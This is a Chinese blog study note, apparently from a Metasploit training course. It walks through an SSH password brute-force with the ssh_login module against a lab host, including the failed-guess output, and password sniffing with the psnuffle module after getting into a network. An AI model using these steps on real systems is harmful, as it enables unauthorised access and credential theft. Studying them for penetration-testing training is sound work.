zoukankan      html  css  js  c++  java
  • MSF魔鬼训练营-3.3.2 口令猜测与嗅探

    密码暴力破解以SSH为例,其他协议方法类似
    SSH
         msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > set rhosts 192.168.3.199
    rhosts => 192.168.3.199
    msf auxiliary(ssh_login) > set username root
    username => root
    msf auxiliary(ssh_login) > set pass_file /root/pass.txt
    pass_file => /root/pass.txt
    msf auxiliary(ssh_login) > set threads 100
    threads => 100
    msf auxiliary(ssh_login) > run
     
    [*] SSH - Starting bruteforce
    [-] SSH - Failed: 'root:19500101an'
    [-] SSH - Failed: 'root:19500101ba'
    [-] SSH - Failed: 'root:19500101bai'
    [-] SSH - Failed: 'root:19500101ban'
    [-] SSH - Failed: 'root:19500101bao'
    [-] SSH - Failed: 'root:19500101bei'
    [-] SSH - Failed: 'root:19500101bi'
    [-] SSH - Failed: 'root:19500101bian'
     

    在计入对方网络的初始访问点后才能够方便的使用psnuffle模块进行口令嗅探。条件允许的话再介入网络的整个过程都要保持嗅探器的运行。增加截获口令的可能性。
    msf > use auxiliary/sniffer/psnuffle
    msf auxiliary(psnuffle) > show options
     
    Module options (auxiliary/sniffer/psnuffle):
     
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       FILTER                      no        The filter string for capturing traffic
       INTERFACE                   no        The name of the interface
       PCAPFILE                    no        The name of the PCAP capture file to process
       PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
       SNAPLEN    65535            yes       The number of bytes to capture
       TIMEOUT    500              yes       The number of seconds to wait for new data
     
     
    Auxiliary action:
     
       Name     Description
       ----     -----------
       Sniffer 
     
     
    msf auxiliary(psnuffle) > run
    [*] Auxiliary module execution completed
    msf auxiliary(psnuffle) >
    [*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
    [*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
    [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
    [*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
    [*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
    [*] Sniffing traffic.....
     
     
  • 相关阅读:
    网页HTML到8.20前
    数据库SQLServer
    构建之法读后感
    VS2013 生成安装文件
    工大助手(自动化部署)
    工大助手(用户名、密码错误提示)
    工大助手(验证码错误提示)
    工大助手(加权成绩计算)
    Wireshark插件编写
    微软认知服务——人脸识别
  • 原文地址:https://www.cnblogs.com/enderzhou/p/7554283.html
Copyright © 2011-2022 走看看